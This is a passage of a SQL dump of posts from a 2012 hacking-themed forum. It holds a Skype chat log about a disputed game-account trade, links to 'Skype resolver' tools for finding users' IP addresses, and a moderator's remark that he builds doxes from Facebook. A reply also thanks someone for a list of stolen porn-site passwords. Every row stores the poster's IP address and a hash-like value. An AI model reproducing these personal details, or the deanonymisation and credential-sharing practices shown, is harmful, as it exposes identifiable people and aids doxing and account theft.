| Jacob: Nope\n[10/14/2012 1:56:44 PM] Ryan | Jacob: Not connected to my email\n[10/14/2012 1:56:49 PM] Ryan | Jacob: + I don\'t know the password.\n[10/14/2012 1:56:54 PM] Zane Anderson: btw your born in 93 too?\n[10/14/2012 1:57:00 PM] Ryan | Jacob: Security Questions are no use\n[10/14/2012 1:57:01 PM] Ryan | Jacob: No\n[10/14/2012 1:57:08 PM] Ryan | Jacob: I just made up the name and birthday\n[10/14/2012 1:57:11 PM] Zane Anderson: oh\n[10/14/2012 1:57:15 PM] Ryan | Jacob: :3\n[10/14/2012 1:57:21 PM] Zane Anderson: well i was born in 93\n[10/14/2012 1:57:25 PM] Ryan | Jacob: Oh\n[10/14/2012 1:57:35 PM] Zane Anderson: its almost my birthday lol\n[10/14/2012 1:57:53 PM] Zane Anderson: its on the 21 of this month\n[10/14/2012 1:57:55 PM] Ryan | Jacob: Happy Earliy Birthday\n[10/14/2012 1:57:57 PM] Ryan | Jacob: :)\n[10/14/2012 1:58:14 PM] Zane Anderson: lol ty\n[10/14/2012 1:59:15 PM] Zane Anderson: now to change my skin to look more creeper\n[10/14/2012 2:03:43 PM] Ryan | Jacob: Lolo\n[10/14/2012 2:03:45 PM] Ryan | Jacob: Lool\n[10/14/2012 2:03:50 PM] Ryan | Jacob: Wanna play MC together or something?\n[10/14/2012 2:03:54 PM] Ryan | Jacob: Or AQW? :P\n[10/14/2012 2:03:58 PM] Zane Anderson: ima slenderman now!\n[10/14/2012 2:04:05 PM] Ryan | Jacob: Omg\n[10/14/2012 2:04:09 PM] Ryan | Jacob: I love Slenderman\n[10/14/2012 2:04:15 PM] Ryan | Jacob: But I don\'t want to risk my skin\n[10/14/2012 2:04:31 PM] Zane Anderson: lol you should of seen me on one of the cracked servers\n[10/14/2012 2:04:50 PM] Zane Anderson: standing in front of someguys window\n[10/14/2012 2:04:58 PM] Zane Anderson: just staring\n[10/14/2012 2:05:00 PM] Ryan | Jacob: Lol\n[10/14/2012 2:05:15 PM] Ryan | Jacob: House in the middle of the woods\n[10/14/2012 2:05:18 PM] Ryan | Jacob: A guy\'s in there.\n[10/14/2012 2:05:19 PM] Ryan | Jacob: :P\n[10/14/2012 2:05:33 PM] Zane Anderson: but yeah what server you play in minecraft?\n[10/14/2012 2:06:40 PM] Ryan | Jacob: Just saying\n[10/14/2012 2:06:52 PM] Ryan | Jacob: You bought too much useless items with your AC :/\n[10/14/2012 2:06:57 PM] Ryan | Jacob: I only got 81 ACs\n[10/14/2012 2:07:01 PM] Ryan | Jacob: And I can\'t buy anything with it\n[10/14/2012 2:07:05 PM] Zane Anderson: er.... lol\n[10/14/2012 2:07:11 PM] Zane Anderson: just sell the useless crap\n[10/14/2012 2:07:17 PM] Zane Anderson: lol\n[10/14/2012 2:10:09 PM] Ryan | Jacob: :/\n[10/14/2012 2:10:16 PM] Ryan | Jacob: Got no ACs from that :P\n[10/14/2012 2:10:20 PM] Zane Anderson: really?\n[10/14/2012 2:10:27 PM] Ryan | Jacob: Yeah..\n[10/14/2012 2:10:37 PM] Zane Anderson: er\n[10/14/2012 2:10:39 PM] Zane Anderson: lol\n[10/14/2012 2:11:10 PM] Zane Anderson: well i have no money to spen\n[10/14/2012 2:11:14 PM] Zane Anderson: spend*\n[10/14/2012 2:18:58 PM] Ryan | Jacob: :/\n[10/14/2012 2:19:00 PM] Ryan | Jacob: Okay.\n[10/14/2012 2:19:23 PM] Zane Anderson: so how do i find server to play lol\n[10/14/2012 2:19:39 PM] Ryan | Jacob: Search on Google\n[10/14/2012 2:19:45 PM] Ryan | Jacob: :P\n[10/14/2012 2:19:47 PM] Zane Anderson: mk\n[10/14/2012 2:19:48 PM] Ryan | Jacob: What else\n[10/14/2012 2:19:50 PM] Ryan | Jacob: xD\n[10/14/2012 2:26:37 PM] Ryan | Jacob: You playing it? :P\n[10/14/2012 2:26:46 PM] Zane Anderson: yea\n[10/14/2012 2:26:52 PM] Ryan | Jacob: Wait\n[10/14/2012 2:26:53 PM] Ryan | Jacob: Answer it\n[10/14/2012 2:26:59 PM] Ryan | Jacob: Mute your mic if you want.\n[10/14/2012 2:27:09 PM] Ryan | Jacob: I need to show you something.\n[10/14/2012 2:27:17 PM] Ryan | Jacob: Using ShareScreen\n[10/14/2012 2:27:20 PM] *** Call to Zane Anderson, no answer. ***\n[10/14/2012 2:28:00 PM] *** Call to Zane Anderson, no answer. ***\n[10/14/2012 2:28:57 PM] Ryan | Jacob: :/\n[10/14/2012 2:30:45 PM] Zane Anderson: uhh\n[10/14/2012 2:30:58 PM] Zane Anderson: i answer then my computer failed on me\n[10/14/2012 2:31:04 PM] Ryan | Jacob: ://\n[10/14/2012 2:31:05 PM] Ryan | Jacob: :/\n[10/14/2012 2:31:21 PM] *** Call to Zane Anderson ***\n[10/14/2012 2:31:30 PM] Ryan | Jacob: Lool\n[10/14/2012 2:31:34 PM] Ryan | Jacob: My brother was singing -.-\n[10/14/2012 2:31:49 PM] Ryan | Jacob: Is this ok\n[10/14/2012 2:32:18 PM] Ryan | Jacob: ??\n[10/14/2012 2:32:57 PM] Ryan | Jacob: Is it good?\n[10/14/2012 2:33:08 PM] Ryan | Jacob: Okay\n[10/14/2012 2:33:10 PM] Ryan | Jacob: Thanks :)\n[10/14/2012 2:33:25 PM] *** Call ended, duration 02:04 ***\n[10/14/2012 2:33:34 PM] Zane Anderson: woah\n[10/14/2012 2:33:38 PM] Ryan | Jacob: ?\n[10/14/2012 2:33:45 PM] Zane Anderson: thats was something new for me\n[10/14/2012 2:33:51 PM] Ryan | Jacob: What was?\n[10/14/2012 2:33:54 PM] Zane Anderson: calling\n[10/14/2012 2:33:59 PM] Ryan | Jacob: :P\n[10/14/2012 2:37:24 PM] Zane Anderson: so you on aqw?\n[10/14/2012 2:37:32 PM] Ryan | Jacob: Yah\n[10/14/2012 2:37:35 PM] Ryan | Jacob: Haven\'t done anything\n[10/14/2012 2:37:38 PM] Zane Anderson: lol\n[10/14/2012 2:37:41 PM] Ryan | Jacob: Was in Battleon afk the whole time\n[10/14/2012 2:38:05 PM] Zane Anderson: btw how did my voice sound lol\n[10/14/2012 2:38:13 PM] Ryan | Jacob: Horrible :3\n[10/14/2012 2:38:18 PM] Ryan | Jacob: Probably your mic though\n[10/14/2012 2:38:22 PM] Ryan | Jacob: Too much wind or something\n[10/14/2012 2:38:31 PM] Ryan | Jacob: And background noise was horrifying\n[10/14/2012 2:38:36 PM] Zane Anderson: lol\n[10/14/2012 2:38:56 PM] Zane Anderson: i was wondering cuz i had something in my mouth\n[10/14/2012 2:39:00 PM] Ryan | Jacob: Oh\n[10/14/2012 2:39:43 PM] Zane Anderson: did i sound manly? lol\n[10/14/2012 2:39:58 PM] Ryan | Jacob: No.\n[10/14/2012 2:40:05 PM] Ryan | Jacob: + I could barely hear you.\n[10/14/2012 2:40:06 PM] Zane Anderson: lol\n[10/14/2012 2:40:10 PM] Ryan | Jacob: Background noise\n[10/14/2012 2:40:15 PM] Ryan | Jacob: + wind or something.\n[10/14/2012 2:40:16 PM] Zane Anderson: probabaly\n[10/14/2012 2:40:26 PM] Zane Anderson: gah, my laptop\n[10/14/2012 2:40:41 PM] Zane Anderson: i think it was the vent on the side\n[10/14/2012 2:40:51 PM] Zane Anderson: and theirs a fan going off in the next room\n[10/14/2012 2:42:27 PM] Ryan | Jacob: Yeah\n[10/14/2012 2:42:42 PM] Zane Anderson: lol\n[10/14/2012 2:43:59 PM] Zane Anderson: btw you watch pewdiepie or tobuscus?\n[10/14/2012 2:44:10 PM] Ryan | Jacob: No\n[10/14/2012 2:44:53 PM] Zane Anderson: oh ok\n[10/14/2012 4:15:03 PM] Zane Anderson: so you still playing? lol\n[10/14/2012 4:15:12 PM] Ryan | Jacob: No :3\n[10/14/2012 4:15:13 PM] Ryan | Jacob: Loo\n[10/14/2012 4:15:14 PM] Ryan | Jacob: Lool\n[10/14/2012 4:15:24 PM] Ryan | Jacob: Just gave you +4 Rep on L33tHacking\n[10/14/2012 4:15:31 PM] Zane Anderson: lol rly?\n[10/14/2012 4:15:35 PM] Ryan | Jacob: Yeah.\n[10/14/2012 4:15:57 PM] Ryan | Jacob: You\'re welcome.\n[10/14/2012 4:16:02 PM] Zane Anderson: smow zow\n[10/14/2012 4:16:52 PM] Ryan | Jacob: Hmm?\n[10/14/2012 4:17:06 PM] Zane Anderson: idk got it off of adventure time\n[10/14/2012 4:17:13 PM] Ryan | Jacob: Lool\n[10/14/2012 4:17:14 PM] Ryan | Jacob: :P\n[10/14/2012 4:17:18 PM] Ryan | Jacob: How about you?\n[10/14/2012 4:17:21 PM] Ryan | Jacob: Still playing MC?\n[10/14/2012 4:17:41 PM] Zane Anderson: nop, gonna watch a video on youtube\n[10/14/2012 4:17:58 PM] Ryan | Jacob: Okay.\n[10/14/2012 4:18:05 PM] Ryan | Jacob: Are you sure it\'s not RedTube?\n[10/14/2012 4:18:07 PM] Ryan | Jacob: Hm?\n[10/14/2012 4:18:08 PM] Ryan | Jacob: :P\n[10/14/2012 4:18:18 PM] Zane Anderson: http://www.youtube.com/watch?v=GAgqfvy4uYA&feature=g-all-u\n[10/14/2012 4:19:45 PM] Ryan | Jacob: What can I get from the DF account?\n[10/14/2012 4:19:56 PM] Zane Anderson: idk lol\n[10/14/2012 4:20:16 PM] Ryan | Jacob: Is it a member too?\n[10/14/2012 4:20:20 PM] Ryan | Jacob: The DF account\n[10/14/2012 4:20:23 PM] Zane Anderson: the stupid 10th annivesery came out\n[10/14/2012 4:20:38 PM] Ryan | Jacob: And?\n[10/14/2012 4:20:40 PM] Zane Anderson: so i couldn\'t find the tower to get the df\n[10/14/2012 4:20:47 PM] Zane Anderson: items\n[10/14/2012 4:20:50 PM] Ryan | Jacob: What do you mean\n[10/14/2012 4:20:54 PM] Ryan | Jacob: Oh\n[10/14/2012 4:21:03 PM] Zane Anderson: where you get like df and mq and aq items\n[10/14/2012 4:21:08 PM] Ryan | Jacob: Oh\n[10/14/2012 4:21:13 PM] Zane Anderson: couldn\'t find it\n[10/14/2012 4:21:57 PM] Ryan | Jacob: Same..\n[10/14/2012 4:22:09 PM] Zane Anderson: ik that pissed me off\n[10/14/2012 4:25:20 PM] Ryan | Jacob: Can\'t find it..\n[10/14/2012 4:25:25 PM] Ryan | Jacob: It\'s supposed to be in the tower..\n[10/14/2012 4:25:48 PM] Zane Anderson: yeah but that 10th anniversry crap is there\n[10/14/2012 4:26:26 PM] Ryan | Jacob: -.-\n[10/14/2012 4:26:28 PM] Ryan | Jacob: Yeh\n[10/14/2012 4:27:12 PM] Ryan | Jacob: Really gay..\n[10/14/2012 4:27:18 PM] Zane Anderson: yea\n[10/14/2012 4:27:30 PM] Ryan | Jacob: Just gonna train..\n[10/14/2012 4:27:34 PM] Ryan | Jacob: Nothing better to do..\n[10/14/2012 4:28:53 PM] Zane Anderson: atleast its almost over\n[10/14/2012 4:29:38 PM] Ryan | Jacob: Yeah\n[10/14/2012 4:33:01 PM] Ryan | Jacob: Anyways\n[10/14/2012 4:33:04 PM] Ryan | Jacob: I\'m hacking\n[10/14/2012 4:33:11 PM] Zane Anderson: lol?\n[10/14/2012 4:33:16 PM] Ryan | Jacob: :D\n[10/14/2012 4:33:24 PM] Ryan | Jacob: Gonna be level 45 in a few days or so.\n[10/14/2012 4:33:34 PM] Ryan | Jacob: If I bot 24/7\n[10/14/2012 4:33:37 PM] Ryan | Jacob: And overnight\n[10/14/2012 4:33:42 PM] Ryan | Jacob: With my Boost items\n[10/14/2012 4:33:47 PM] Zane Anderson: lol\n[10/14/2012 4:37:09 PM] Ryan | Jacob: What does Toki The Archangel stand for?\n[10/14/2012 4:37:11 PM] Ryan | Jacob: Just asking\n[10/14/2012 4:37:33 PM] Zane Anderson: idk Toki is from metalocylpse\n[10/14/2012 4:38:24 PM] Ryan | Jacob: What\'s that mean? :P\n[10/14/2012 4:38:32 PM] Zane Anderson: its a show\n[10/14/2012 4:40:42 PM] Ryan | Jacob: Oh\n[10/14/2012 4:40:48 PM] Zane Anderson: yea lol\n[10/14/2012 4:40:54 PM] Ryan | Jacob: Botting now :3\n[10/14/2012 4:41:01 PM] Zane Anderson: lol\n[10/14/2012 4:41:41 PM] *** Call to Zane Anderson ***\n[10/14/2012 4:42:09 PM] Ryan | Jacob: See? :P\n[10/14/2012 4:42:59 PM] Ryan | Jacob: Fun :3\n[10/14/2012 4:43:03 PM] Ryan | Jacob: xD\n[10/14/2012 4:48:49 PM] *** Call ended, duration 07:08 ***\n[10/14/2012 4:51:31 PM] Ryan | Jacob: Back\n[10/14/2012 4:51:36 PM] Ryan | Jacob: Had to carry in groceries\n[10/14/2012 4:51:40 PM] Zane Anderson: lol\n[10/14/2012 4:51:48 PM] *** Call to Zane Anderson, duration 09:08. ***\n[10/14/2012 9:11:32 PM] Ryan | Jacob: Hey\n[10/14/2012 9:11:39 PM] Ryan | Jacob: Did you change the password to the AQW Account?\n[10/14/2012 9:11:47 PM] Ryan | Jacob: Because I can\'t seem to login it anymore...\n[10/14/2012 9:37:15 PM] Ryan | Jacob: You changed your password..\n[10/14/2012 9:37:20 PM] Ryan | Jacob: It wouldn\'t allow me to login\n[10/14/2012 9:37:36 PM] Ryan | Jacob: And also I tried recovering it and it said that my email was not registered\n[10/14/2012 9:38:08 PM] Ryan | Jacob: and then I tried recovering the password using Removed for safety reasons and it sent it to your email..\nYou clicked on the dispution link.\n[10/14/2012 9:38:14 PM] Ryan | Jacob: Why would you scam me :/\n[10/15/2012 3:22:00 PM] Ryan | Jacob: Why did you scam me? :/\n[10/15/2012 3:22:09 PM] Ryan | Jacob: You changed the password..\n[10/15/2012 3:22:16 PM] Ryan | Jacob: And I gave you my personal MC Account.\n[10/15/2012 3:22:21 PM] Ryan | Jacob: :/\n[10/15/2012 3:22:24 PM] Ryan | Jacob: Afk.\n[10/15/2012 9:35:53 PM] Ryan | Jacob: Hey\n[10/15/2012 11:14:47 PM] Ryan | Jacob: Zane..\n[10/15/2012 11:14:56 PM] Ryan | Jacob: The actions you did were wrong.\n[10/15/2012 11:15:03 PM] Ryan | Jacob: Shouldn\'t have done that..\n[9:32:01 AM] Zane Anderson: Hey Read my pm on leet hacking\n[3:24:19 PM] Ryan | Jacob: I\'m not even going to bother..\n\n\nMe on AQ account 3 hours before the password was changed\n[img]http://i.imgur.com/kyWbG.png[/img]\n\nHis Character Page now:\nhttp://www.aq.com/aw-character.asp?id=Toki%20The%20ArchAngel\n\nI never equipped any of those items he is currently equipping & I never had some of those items before.\nSomeone had to go on the account and get it.\n\n\n\n\nGreed you went first. But you never changed the email to mine on the AQW account.\nYou didn\'t give me full information.\n\n\nI did. \nI went first\nI changed the MC Password, Email, and other stuff first.\nAnd gave it to you.\n\n\nSo I went first.\nNot you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '59c7316a37fa908af817335b084b6741', '0', '0'); INSERT INTO mybb_posts VALUES('4914', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '61', 'NXK', '1350416696', '-Childish Gambino <- favorite \nhttp://www.youtube.com/watch?v=TCRTaw9SY8E\n\n-A$AP Rocky\nhttp://www.youtube.com/watch?v=ofoIMg76Sng\n\n-Jurrasic 5\nhttp://www.youtube.com/watch?v=KeN9c2GYJkk\n\n\n-Anyone in good music is really good (kayne,Pusha T,Common,2Chainz, etc)\nhttp://www.youtube.com/watch?v=GJcQ5j3q0S0', '99.253.94.204', '1677549260', '1', '0', '61', '1350416949', '1', 'c2aedd348b782815658a345d719b3cfe', '0', '1350416949'); INSERT INTO mybb_posts VALUES('4915', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '214', 'Rave™', '1350417640', 'I will join! I would love to win this!', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '26e0d42326943bc86b32765a5cdce594', '0', '0'); INSERT INTO mybb_posts VALUES('4916', '886', '4820', '35', 'RE: My logo', '0', '257', 'XxTREYZxX', '1350418044', 'ok thanks for the comments guys i will be closing this thread and making a new thread when i get my new avatar thanks for all your comments!', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '5427cb2f66005bda7d5031e7a4200f60', '0', '0'); INSERT INTO mybb_posts VALUES('4917', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '257', 'XxTREYZxX', '1350418387', 'hello and welcome,remember stay HQ and active:)', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '83d7e12a372f96e72e24c9d955e05833', '0', '0'); INSERT INTO mybb_posts VALUES('4918', '869', '4712', '74', 'RE: who loves counter strike', '0', '257', 'XxTREYZxX', '1350418780', 'you should try getting in to gaming you will love its great fun, and competive when you wanna.\nand i thinks every one likes it exept a few', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'ce942017f8313deb6e47cb17349451a7', '0', '0'); INSERT INTO mybb_posts VALUES('4919', '899', '0', '7', '[Demo] New L33THacking Skype Resolver', '0', '61', 'NXK', '1350419409', 'http://nxkallday.comoj.com/ [It may work it has a old api I used to use]\n\nMy API isn\'t in it yet. \n\nThoughts?\n\nI have a Lifetime API I\'m willing to trade or sell Let me know.', '99.253.94.204', '1677549260', '1', '0', '61', '1350419536', '1', '1ef07ca892afb141ac6d1b3ab774cf37', '0', '1350419536'); INSERT INTO mybb_posts VALUES('4920', '822', '4915', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '228', 'VirtualLegend', '1350420329', '[quote=\'Rave™\' pid=\'4915\' dateline=\'1350417640\']\r\nI will join! I would love to win this!\r\n[/quote]\r\n\r\nNice The People Above this comment has 100% chance to win the giveaway', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6053ec860227084218e5e19861ea2f0f', '0', '0'); INSERT INTO mybb_posts VALUES('4921', '861', '4620', '7', 'RE: L33T Hacking Milestones', '0', '228', 'VirtualLegend', '1350420511', '[quote=\'iTzIpod\' pid=\'4620\' dateline=\'1350225150\']\r\nMe, t3h jok3r, Apathy, Pontaholic (I don\'t know your name sorry :/ ) , Flamingworm, NXK, forgot who else..\r\n[/quote]\r\n\r\nLol you forgot me :(', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2bba18fee38277ece6f85b81020e3648', '0', '0'); INSERT INTO mybb_posts VALUES('4922', '893', '4885', '77', 'RE: GamerTag Availability Checker Site', '0', '228', 'VirtualLegend', '1350420858', 'I don\'t have a Xbox but Nice Share :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '34f669a4c788308ca64b27aa807d0db3', '0', '0'); INSERT INTO mybb_posts VALUES('4923', '888', '4832', '7', 'RE: Greed is a scammer', '0', '61', 'NXK', '1350421789', 'This has been dealt with, Due to greed not being able to show Any proof he Didn\'t do it.\n\nWe do not allow scamming, No matter what.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '8feaafecb057893fea84d8352644f62b', '0', '0'); INSERT INTO mybb_posts VALUES('4924', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '228', 'VirtualLegend', '1350421792', 'Favorite Rapper: Drake & Lil Wayne', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4b5017273cf4f8b6fe4adedc06d2f7c1', '0', '0'); INSERT INTO mybb_posts VALUES('4925', '884', '4795', '2', 'RE: Testing new Mycodes', '0', '61', 'NXK', '1350421871', '[hl=Yellow]This is pretty awesome![/hl]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd75775f9f4ac44f5edb4568000a2d72a', '0', '0'); INSERT INTO mybb_posts VALUES('4926', '898', '4908', '71', 'RE: Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '228', 'VirtualLegend', '1350421887', '[quote=\'R?????zo?\' pid=\'4908\' dateline=\'1350408257\']\r\nAlreay knew this, thanks for sharing though :)\r\n[/quote]\r\n\r\nDo you know more handy site\'s ?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '9c4715de0fb9a056e667fc5b035715ab', '0', '0'); INSERT INTO mybb_posts VALUES('4927', '190', '665', '56', 'RE: Copy and paste game', '0', '228', 'VirtualLegend', '1350424262', 'NEFantasy\'s PPD E-book (I don\'t know where i got this)', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '9ef70d961769f6896c81cf8ac4f21f91', '0', '0'); INSERT INTO mybb_posts VALUES('4928', '884', '4795', '2', 'RE: Testing new Mycodes', '0', '1', 't3h jok3r', '1350424473', 'Yup and you can put any background color', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '66ae677078d2201e871be8cc09e0bfa7', '0', '0'); INSERT INTO mybb_posts VALUES('4929', '900', '0', '63', 'Who wants a New Signature !!! | I will make one for you!', '0', '228', 'VirtualLegend', '1350424596', '[align=center][color=#98FB98][size=medium]Hello LH Members,\r\n\r\nIf you don\'t have a signature or want a new one than this is your chance. I will make one for you, if you don\'t like how i made it. I will remake it with your Specific details. The Reason Why I\'m doing this is that i want to get better with GFX and too do something good for the LH Members. \r\n\r\nLeave a Post behind if your intrested.\r\n\r\nAnd As Always Have a Good Day :P [/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '289757fb275acbc7a07df22a0e7a8f49', '0', '0'); INSERT INTO mybb_posts VALUES('4930', '901', '0', '19', '[Junk]L33THacking Skype Resolver!', '0', '214', 'Rave™', '1350424793', '[b]Enjoy <3333\r\nIf it says 127.0.0.1 that is because your trying to resolve a Whitelist username.\r\nAKA Me, or my friend\r\njoker is not whitelisted ;)[/b]\r\n\r\n\r\nhttp://raveresolver.tk/', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '3a848524bfab65c5a807a5d604568a3d', '0', '0'); INSERT INTO mybb_posts VALUES('4931', '888', '4832', '7', 'RE: Greed is a scammer', '0', '1', 't3h jok3r', '1350424811', 'I increased the ban duration to 6 months and IP banned him. If I can get a screenhot on the scammer then I can add his OP into the scammers database with is used world wide but many people, companies and officials', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2ccd320a3f79e461534993accfc612f4', '0', '0'); INSERT INTO mybb_posts VALUES('4932', '887', '4823', '3', 'RE: How did virtual become Mod? Explanation here', '0', '3', '??????????¢™', '1350426576', 'I think everyone understands now.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '6ede60ea4b0890f1f8cad416420316ff', '0', '0'); INSERT INTO mybb_posts VALUES('4933', '889', '4842', '3', 'RE: Vote for a new theme', '0', '3', '??????????¢™', '1350426683', 'It was difficult out of theme 1 and 3 but number 2 I had on my forum before but didnt like it so I changed it. I picked theme 1 only because theme 3 looks kinda like 2 and it might look ugly like 2.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'f1c6931c0b88020eaec515afe4aa0f1f', '0', '0'); INSERT INTO mybb_posts VALUES('4934', '888', '4832', '7', 'RE: Greed is a scammer', '0', '3', '??????????¢™', '1350427159', 'Well bye bye Greed, We hate scammers.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'dfb43b3f6b29ba80f0adbd46eb347b20', '0', '0'); INSERT INTO mybb_posts VALUES('4935', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '3', '??????????¢™', '1350427347', 'I have sent the source to GronGamers.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '3d79278e2d208e0df6cb7600d4562663', '0', '0'); INSERT INTO mybb_posts VALUES('4936', '699', '3559', '47', 'RE: [All Members] Advance Member System', '0', '3', '??????????¢™', '1350427486', 'I have sent the code to Reloadzer\n@??zg???g????61, No problem.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'e00f6ae9939de6fb111aea9d38968a09', '0', '0'); INSERT INTO mybb_posts VALUES('4937', '902', '0', '52', 'Who wants a Tutorial on how to make a Generator in VB', '0', '228', 'VirtualLegend', '1350427511', '[color=#32CD32][align=center]Hi,\r\n\r\nLike as the title says. I have made a Xbox live code generator and i want to do a tutorial who is intrested? \r\n\r\nVideo of My VB generator: \r\n[video=youtube]http://www.youtube.com/watch?v=6v3OgIJ3Jw8&feature=results_video[/video]\r\n\r\nAnd Of course it\'s fake (Don\'t download it)[/align][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5188535ccc44696383578374ed4182fb', '0', '0'); INSERT INTO mybb_posts VALUES('4938', '603', '2922', '47', 'RE: Custom Pastebin Source Code', '0', '214', 'Rave™', '1350427592', 'Wow you are LQ. Even after joker told you \nNO POST AND PM\nYou did post and PM. \nVery LQ and I hope you lose your mod.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '8ea1548025eea6bf59a3f5605016cf6e', '0', '0'); INSERT INTO mybb_posts VALUES('4939', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '62', 'R?????zo?', '1350428242', 'Does not work for me, thanks anyways.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '2f9576e455d28a238006997eb2754c97', '0', '0'); INSERT INTO mybb_posts VALUES('4940', '899', '4919', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '62', 'R?????zo?', '1350428356', '\"IP Resolved: User does not exist or has been offline for a while\"\n\nI get this all the time.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1656e17b0a21315f3c125e9e596b363a', '0', '0'); INSERT INTO mybb_posts VALUES('4941', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1350428386', 'IP Resolved: User does not exist or has been offline for a while', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f9ca71619b10bf5394d6c379f4861f88', '0', '0'); INSERT INTO mybb_posts VALUES('4942', '896', '4892', '23', 'RE: How to secure your Router', '0', '228', 'VirtualLegend', '1350428994', 'Nice Tutorial And a good way to start a Tutorial with a funny picture\n\nKeep the work up !', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '0165ed6c7b87cb155405b26b178de3b3', '0', '0'); INSERT INTO mybb_posts VALUES('4943', '895', '4887', '4', 'RE: D?ea saying hello<3', '0', '1', 't3h jok3r', '1350429014', 'Welcome to L33THacking, where did you find us?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f6e1443edc996d2d814abb1de434b411', '0', '0'); INSERT INTO mybb_posts VALUES('4944', '873', '4752', '7', 'RE: What do you think of Facebook?', '0', '1', 't3h jok3r', '1350430150', '[quote=\'mothered\' pid=\'4752\' dateline=\'1350298529\']\r\nI agree with the above, to have a laugh and post fake details.\r\n\r\n\"FB is a useless site but good for advertising\". Well said Timmy :)\r\n[/quote]\r\n\r\nWell said Mothered. I only use FB for advertising and for creating DOXes.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '26db5edb9d6f2bd987c3fbc2296107da', '0', '0'); INSERT INTO mybb_posts VALUES('4945', '874', '4744', '7', 'RE: N.A.S.A HACKED', '0', '1', 't3h jok3r', '1350430186', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'4744\' dateline=\'1350276589\']\r\ni think they need to upgrade their security settings.\r\n[/quote]\r\nI agree but then the security is there but for how long? Lol I read that quote somewhere.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '335d384267573328905db9b30695e9fa', '0', '0'); INSERT INTO mybb_posts VALUES('4946', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '3', '??????????¢™', '1350430302', 'One day NASA is going to get hacked and never be able to bring the site back.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '3c85dd078e66a2987902d9e7152b0082', '0', '0'); INSERT INTO mybb_posts VALUES('4947', '899', '4940', '7', 'RE: [Demo] New L33THacking Skype Resolver', '0', '1', 't3h jok3r', '1350430312', '[quote=\'R?????zo?\' pid=\'4940\' dateline=\'1350428356\']\r\n\"IP Resolved: User does not exist or has been offline for a while\"\r\n\r\nI get this all the time.\r\n[/quote]\r\n\r\nI even logged on and tried but got the same error, possibly because the API key is done however this is the demo thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a83a758cb3837805ff64023327bc690d', '0', '0'); INSERT INTO mybb_posts VALUES('4948', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '1', 't3h jok3r', '1350430431', 'Umm doesn\'t work. Oh wait nice trolling :D \n\nJK, btw is this the same Resolver NXK is making?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd8b48c6a32f6c8911391b3352ceb19d4', '0', '0'); INSERT INTO mybb_posts VALUES('4949', '821', '4733', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '1', 't3h jok3r', '1350431596', '[quote=\'Timmy\' pid=\'4733\' dateline=\'1350274047\']\r\n[quote=\'t3h jok3r\' pid=\'4578\' dateline=\'1350194065\']\r\nLol Greed.\r\n\r\nOT: I\'m thinking if I should drink water now or after I\'m done checking my emails.\r\n[/quote]\r\n\r\nThis right here is the best answer on this thread.\r\n[/quote]\r\n\r\nLol I was confused that day. I was soo confused that I sent my Geo teacher my English Homework through email lol.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5ce78bc63afec579075217e91cd68fde', '0', '0'); INSERT INTO mybb_posts VALUES('4950', '874', '4946', '7', 'RE: N.A.S.A HACKED', '0', '5', 'Timmy', '1350432568', '[quote=\'??????????¢™\' pid=\'4946\' dateline=\'1350430302\']\r\nOne day NASA is going to get hacked and never be able to bring the site back.\r\n[/quote]\r\n\r\nI think they have backups but i don\'t get how such a big government site keep on getting hacked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9928f1ab00a11688f64cf162b2655253', '0', '0'); INSERT INTO mybb_posts VALUES('4951', '839', '4389', '54', 'RE: Brazzers,Bangbros,RK,and more HUGE MIXXX OF WORKING PASSES FOR 13.OKT.2012', '0', '5', 'Timmy', '1350432662', 'Thanks for the list. I scanned it and it\'s clean.', '72.231.24.165', 